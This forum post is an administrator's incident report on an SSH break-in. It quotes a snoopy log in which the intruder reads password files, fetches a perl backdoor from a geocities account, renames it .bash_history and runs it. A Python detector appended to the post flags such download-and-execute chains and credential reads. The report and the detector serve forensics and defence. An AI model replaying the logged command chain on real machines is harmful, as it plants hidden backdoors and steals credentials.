
Compromised system - still ok?


Hi everybody,

Guess it was my time, this time...

OK, about 4 hours ago the following happened on one of my machines:
1) Somebody tried a dictionary attack from one host
2) He/She/It got in using the user backup (I know... I know...)
3) H/S/I downloaded 2 files from a geocities.com account
4) File 1: no idea what it is or what it does, cannot find it
5) File 2: a perl script that "claims" to be a telnet server

After taking the machine offline, I did the following:
a) locked user backup
b) removed password/interactive login from sshd (should have been done a long time ago)
c) killed the perl script running as user backup
d) find -user backup -mtime 1 > /tmp/file
e) nmap localhost for all ports
f) checked /tmp/file for "unknown files" - found /tmp/.bash_history
g) moved /tmp/.bash_history off the machine for analysis

Here is the snoopy log:
----
Feb  6 10:33:26 mail2 sshd[15544]: Accepted password for backup from port 38842 ssh2
Feb  6 10:33:26 mail2 sshd[22307]: (pam_unix) session opened for user backup by (uid=0)
Feb  6 10:33:26 mail2 snoopy[25178]: [backup, uid:34 sid:25178]: -sh
Feb  6 10:33:26 mail2 snoopy[25087]: [backup, uid:34 sid:25178]: id -u
Feb  6 10:33:41 mail2 sshd[22307]: (pam_unix) session closed for user backup
Feb  6 10:57:26 mail2 sshd[1306]: Accepted keyboard-interactive/pam for backup from port 45424 ssh2
Feb  6 10:57:26 mail2 sshd[4008]: (pam_unix) session opened for user backup by (uid=0)
Feb  6 10:57:26 mail2 snoopy[22447]: [backup, uid:34 sid:22447]: -sh
Feb  6 10:57:26 mail2 snoopy[10020]: [backup, uid:34 sid:22447]: id -u
Feb  6 10:57:30 mail2 snoopy[9165]: [backup, uid:34 sid:22447]: ls -all
Feb  6 10:57:35 mail2 snoopy[18242]: [backup, uid:34 sid:22447]: id
Feb  6 10:57:42 mail2 snoopy[27934]: [backup, uid:34 sid:22447]: uname - -a
Feb  6 10:57:47 mail2 snoopy[27769]: [backup, uid:34 sid:22447]: cat /etc/passwd
Feb  6 10:58:34 mail2 snoopy[19303]: [backup, uid:34 sid:22447]: /sbin/ifconfig
Feb  6 10:58:42 mail2 snoopy[31999]: [backup, uid:34 sid:22447]: cat /etc/hosts
Feb  6 10:59:06 mail2 snoopy[26230]: [backup, uid:34 sid:22447]: ls -all
Feb  6 10:59:09 mail2 snoopy[3092]: [backup, uid:34 sid:22447]: wget
Feb  6 10:59:26 mail2 snoopy[20851]: [backup, uid:34 sid:22447]: wget geocities.com/c0_pampers/jam5.p
Feb  6 10:59:36 mail2 snoopy[25767]: [backup, uid:34 sid:22447]: cat shadow.bak
Feb  6 10:59:41 mail2 snoopy[31313]: [backup, uid:34 sid:22447]: ls -all
Feb  6 10:59:51 mail2 snoopy[14269]: [backup, uid:34 sid:22447]: wget geocities.com/c0_pampers/jam5.p
Feb  6 11:00:00 mail2 snoopy[1647]: [backup, uid:34 sid:22447]: mv jam5.pl.txt .bash_history
Feb  6 11:00:06 mail2 snoopy[22380]: [backup, uid:34 sid:22447]: chmod 755 .bash_history
Feb  6 11:00:10 mail2 snoopy[29495]: [backup, uid:34 sid:22447]: perl .bash_history
Feb  6 11:00:12 mail2 snoopy[29908]: [backup, uid:34 sid:22447]: ps -x
Feb  6 11:00:16 mail2 snoopy[4918]: [backup, uid:34 sid:22447]: ls -all
Feb  6 11:00:18 mail2 snoopy[12984]: [backup, uid:34 sid:22447]: w
Feb  6 11:01:20 mail2 sshd[4008]: (pam_unix) session closed for user backup
----

The telnet server doesn't seem to make any entries in wtmp, hence no `last` or `w` entries on the machine.
However, snoopy still sees commands from the user :)

As far as I can say, H/S/I hasn't been on my machine since. The firewall didn't permit access to the port (34567) opened by the perl script, and my firewall log says there was no access to that port before I tried it from localhost.

The machine runs Linux 2.4.27-grsec-hi, woody testing.
I'm considering taking it back online with 2.4.29-grsec-hi. What do you guys think?

- Many thanks, Peter
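The snoopy log is the useful evidence in this post: snoopy records every exec with the user, uid and session id, so the attacker's commands are visible even though the perl "telnet server" writes nothing to wtmp. As an added example (not part of the original post or of snoopy itself), the Python below parses lines in that format, groups them by session id, and flags the chain seen above: fetch a file, rename it to a dotfile, chmod it, run it with an interpreter, with credential files read along the way. The sample log lines are constructed and modelled on the ones quoted in the post; the source address 192.0.2.10 and the full filename jam5.pl.txt in the wget URL are assumptions, as is the set of downloader and interpreter names in the tag lists.

```python
"""Reconstruct shell sessions from snoopy exec-log lines and flag a staged payload."""
import os
import re
import shlex
from collections import OrderedDict

# One snoopy line: "<syslog ts> <host> snoopy[pid]: [<user>, uid:<n> sid:<n>]: <argv>"
SNOOPY_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) "
    r"snoopy\[\d+\]: \[(?P<user>[^,]+), uid:(?P<uid>\d+) sid:(?P<sid>\d+)\]: (?P<cmd>.*)$"
)

# Assumed tag lists; extend for your environment.
DOWNLOADERS = {"wget", "curl", "ftp", "lynx", "fetch", "tftp"}
INTERPRETERS = {"perl", "python", "sh", "bash", "ruby", "php"}
SENSITIVE_FILES = ("/etc/passwd", "/etc/shadow", "shadow.bak")

# Constructed sample modelled on the post's log. The sshd line is included on
# purpose: the parser must skip non-snoopy lines. 192.0.2.10 is a placeholder.
SAMPLE_LOG = """\
Feb  6 10:33:26 mail2 sshd[15544]: Accepted password for backup from 192.0.2.10 port 38842 ssh2
Feb  6 10:33:26 mail2 snoopy[25178]: [backup, uid:34 sid:25178]: -sh
Feb  6 10:33:26 mail2 snoopy[25087]: [backup, uid:34 sid:25178]: id -u
Feb  6 10:57:26 mail2 snoopy[22447]: [backup, uid:34 sid:22447]: -sh
Feb  6 10:57:42 mail2 snoopy[27934]: [backup, uid:34 sid:22447]: uname -a
Feb  6 10:57:47 mail2 snoopy[27769]: [backup, uid:34 sid:22447]: cat /etc/passwd
Feb  6 10:59:09 mail2 snoopy[3092]: [backup, uid:34 sid:22447]: wget
Feb  6 10:59:26 mail2 snoopy[20851]: [backup, uid:34 sid:22447]: wget geocities.com/c0_pampers/jam5.pl.txt
Feb  6 10:59:36 mail2 snoopy[25767]: [backup, uid:34 sid:22447]: cat shadow.bak
Feb  6 11:00:00 mail2 snoopy[1647]: [backup, uid:34 sid:22447]: mv jam5.pl.txt .bash_history
Feb  6 11:00:06 mail2 snoopy[22380]: [backup, uid:34 sid:22447]: chmod 755 .bash_history
Feb  6 11:00:10 mail2 snoopy[29495]: [backup, uid:34 sid:22447]: perl .bash_history
Feb  6 11:00:18 mail2 snoopy[12984]: [backup, uid:34 sid:22447]: w
"""


def parse_snoopy(text):
    """Return one dict per snoopy line; lines from other daemons are ignored."""
    return [m.groupdict() for m in map(SNOOPY_RE.match, text.splitlines()) if m]


def group_by_session(events):
    """Group events by sid, preserving log order (snoopy's sid == session leader pid)."""
    sessions = OrderedDict()
    for e in events:
        sessions.setdefault(e["sid"], []).append(e)
    return sessions


def is_dotfile(path):
    name = os.path.basename(path)
    return name.startswith(".") and name not in (".", "..")


def classify(cmd):
    """Tag one command line, or return None if it looks benign."""
    try:
        argv = shlex.split(cmd)
    except ValueError:          # unbalanced quotes in the logged argv
        argv = cmd.split()
    if not argv:
        return None
    prog, args = os.path.basename(argv[0]), argv[1:]
    if prog in DOWNLOADERS and args:            # bare "wget" with no URL is noise
        return "download"
    if prog in ("mv", "cp") and len(args) >= 2 and is_dotfile(args[-1]):
        return "hide_as_dotfile"                # e.g. mv jam5.pl.txt .bash_history
    if prog == "chmod" and any(is_dotfile(a) for a in args[1:]):
        return "chmod_dotfile"
    if prog in INTERPRETERS and any(is_dotfile(a) for a in args):
        return "exec_dotfile"                   # e.g. perl .bash_history
    if prog == "cat" and any(a.endswith(SENSITIVE_FILES) for a in args):
        return "credential_read"
    return None


def analyze(text):
    """Per sid: tagged commands in order, and whether a download was later run as a dotfile."""
    report = OrderedDict()
    for sid, evs in group_by_session(parse_snoopy(text)).items():
        hits = [(e["ts"], tag, e["cmd"]) for e in evs for tag in [classify(e["cmd"])] if tag]
        if not hits:
            continue
        tags = [t for _, t, _ in hits]
        chain = False
        if "download" in tags and "exec_dotfile" in tags:
            last_exec = max(i for i, t in enumerate(tags) if t == "exec_dotfile")
            chain = tags.index("download") < last_exec
        report[sid] = {"user": evs[0]["user"], "uid": evs[0]["uid"],
                       "hits": hits, "payload_chain": chain}
    return report


if __name__ == "__main__":
    for sid, r in analyze(SAMPLE_LOG).items():
        verdict = "STAGED PAYLOAD" if r["payload_chain"] else "review"
        print(f"sid {sid} user {r['user']} (uid {r['uid']}): {verdict}")
        for ts, tag, cmd in r["hits"]:
            print(f"  {ts}  {tag:16s} {cmd}")
```

Grouping by sid matters here: the first session (sid 25178) only ran `id -u` and drops out of the report, while the second one is flagged because a download precedes the execution of a dotfile in the same session. Run it against the real file with `analyze(open("/var/log/auth.log").read())`; since the rules key on argv alone, a script renamed to something innocuous is still caught when it is handed to perl, which is exactly the trick the post's attacker used.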